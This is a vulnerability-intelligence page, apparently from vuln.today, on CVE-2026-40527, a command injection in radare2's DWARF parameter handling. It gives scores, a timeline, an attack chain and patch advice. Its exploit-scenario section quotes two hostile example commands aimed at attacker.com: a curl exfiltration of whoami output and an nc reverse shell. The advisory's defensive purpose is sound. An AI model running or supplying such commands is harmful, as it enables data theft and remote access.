Which versions of Radare2 are affected by CVE-2026-40527?

CVE-2026-40527 is a command injection vulnerability in radare2's DWARF parsing that allows local attackers to execute arbitrary commands through malicious ELF binaries.. A patch is available.

How to fix or mitigate CVE-2026-40527?

Within 24 hours: identify all radare2 installations in your environment and determine current versions. Within 7 days: apply vendor-released patch (commit bc5a890 or later stable release) to all affected radare2 instances and verify via version check. Within 30 days: audit recent binary analysis activities for suspicious execution patterns and conduct tabletop review of radare2 usage policies in security workflows.

Radare2 CVE-2026-40527

Q: What is the CVSS score of CVE-2026-40527?

CVE-2026-40527 has a CVSS 4.0 base score of 8.5 (High). CVSS vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

EUVD-2026-23534 HIGH

OS Command Injection (CWE-78)

2026-04-17 VulnCheck

GHSA-4pc8-6qgf-fgv2

Command Injection Radare2

8.5

CVSS 4.0 · NVD

Severity by source

NVD PRIMARY

8.5 HIGH

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

SUSE

7.8 HIGH

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Primary rating from NVD.

CVSS VectorNVD

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Local

Attack Complexity

Low

Privileges Required

None

User Interaction

Scope

Lifecycle Timeline

Re-analysis Queued

Apr 17, 2026 - 21:22 vuln.today

cvss_changed

CVSS changed

Apr 17, 2026 - 21:22 NVD

7.8 (HIGH) 8.5 (HIGH)

Analysis Generated

Apr 17, 2026 - 21:11 vuln.today

EUVD ID Assigned

Apr 17, 2026 - 20:45 euvd

EUVD-2026-23534

Analysis Generated

Apr 17, 2026 - 20:45 vuln.today

Patch released

Apr 17, 2026 - 20:45 nvd

Patch available

CVE Published

Apr 17, 2026 - 20:25 nvd

HIGH 8.5

DescriptionCVE.org

radare2 prior to commit bc5a890 contains a command injection vulnerability in the afsv/afsvj command path where crafted ELF binaries can embed malicious r2 command sequences as DWARF DW_TAG_formal_parameter names. Attackers can craft a binary with shell commands in DWARF parameter names that execute when radare2 analyzes the binary with aaa and subsequently runs afsvj, allowing arbitrary shell command execution through the unsanitized parameter interpolation in the pfq command string.

AnalysisAI

Command injection in radare2's DWARF parsing (afsv/afsvj commands) allows local attackers to execute arbitrary shell commands by embedding malicious r2 command sequences in specially crafted ELF binaries. When a user opens the malicious binary and runs analysis commands (aaa followed by afsvj), unsanitized DW_TAG_formal_parameter names are interpolated into pfq command strings, triggering code execution. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Craft ELF with malicious DWARF parameter names

Delivery

Distribute to target analyst

Exploit

Victim opens binary in radare2

Install

Victim runs 'aaa' analysis

Victim executes 'afsvj' command

Execute

DWARF parser extracts unsanitized names

Impact

Command injection via pfq interpolation

Step 8

Arbitrary shell command execution

Recon

Craft ELF with malicious DWARF parameter names

Delivery

Distribute to target analyst

Exploit

Victim opens binary in radare2

Install

Victim runs 'aaa' analysis

Victim executes 'afsvj' command

Execute

DWARF parser extracts unsanitized names

Impact

Command injection via pfq interpolation

Step 8

Arbitrary shell command execution

Vulnerability AssessmentAI

Exploitation	Attacker must craft an ELF binary with malicious r2 command sequences embedded in DWARF DW_TAG_formal_parameter name fields. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	Real-world risk is MODERATE despite the 7.8 CVSS score. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker crafts a malicious ELF binary embedding shell commands (e.g., 'curl attacker.com/exfil?data=$(whoami)' or 'nc -e /bin/sh attacker.com 4444') within DWARF DW_TAG_formal_parameter name fields. A security researcher or malware analyst downloads this binary (disguised as legitimate sample or planted via supply chain compromise) and opens it in radare2. …
Remediation	Update radare2 to commit bc5a89033db3ecb5b1f7bf681fc6ba4dcfc14683 or later from the official repository at https://github.com/radareorg/radare2. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: identify all radare2 installations in your environment and determine current versions. …

Threat intelligence, references, and detailed analysis are available after sign-in.

Vendor StatusVendor

SUSE

Severity: High

CVE-2026-40527 vulnerability details – vuln.today

Back

Radare2 CVE-2026-40527

Severity by source

CVSS VectorNVD

Lifecycle Timeline

DescriptionCVE.org

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

Vendor StatusVendor

SUSE

Share

External POC / Exploit Code